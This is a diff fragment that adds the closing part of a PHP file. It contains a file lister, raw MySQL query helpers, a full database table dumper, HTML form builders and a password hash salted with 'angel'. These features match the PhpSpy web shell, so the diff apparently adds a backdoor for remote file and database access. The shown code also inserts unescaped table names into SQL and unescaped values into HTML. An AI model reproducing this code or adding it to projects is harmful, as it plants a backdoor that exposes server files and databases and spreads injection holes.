+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	global $mysqllink;
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql,$mysqllink)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	global $mysqllink;
+	return @mysql_query($sql,$mysqllink);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($fileSize) {
+	$size = sprintf("%u", $fileSize);
+	if($size == 0) {
+		return '0 Bytes' ;
+	}
+	$sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
+	return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
+}
+// 备份数据库
+function sqldumptable($table, $fp=0) {
+	global $mysqllink;
+
+	$tabledump = "DROP TABLE IF EXISTS `$table`;\n";
+	$res = q("SHOW CREATE TABLE $table");
+	$create = mysql_fetch_row($res);
+	$tabledump .= $create[1].";\n\n";
+
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+	$tabledump = '';
+	$rows = q("SELECT * FROM $table");
+	while ($row = mysql_fetch_assoc($rows)) {
+		foreach($row as $k=>$v) {
+			$row[$k] = "'".@mysql_real_escape_string($v)."'";
+		}
+		$tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fwrite($fp,"\n\n");
+	fr($rows);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			if ($arg['nokey']) {
+				foreach ($arg['option'] as $value) {
+					if ($arg['selected']==$value) {
+						p("<option value=\"$value\" selected>$value</option>");
+					} else {
+						p("<option value=\"$value\">$value</option>");
+					}
+				}
+			} else {
+				foreach ($arg['option'] as $key=>$value) {
+					if ($arg['selected']==$key) {
+						p("<option value=\"$key\" selected>$value</option>");
+					} else {
+						p("<option value=\"$key\">$value</option>");
+					}
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	global $self;
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $self, $nowpath;
+	p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+function encode_pass($pass) {
+	$pass = md5('angel'.$pass);
+	$pass = md5($pass.'angel');
+	$pass = md5('angel'.$pass.'angel');
+	return $pass;
+}
+
+function pr($s){
+	echo "<pre>".print_r($s).'</pre>';
+}
+
+?>
\ No newline at end of file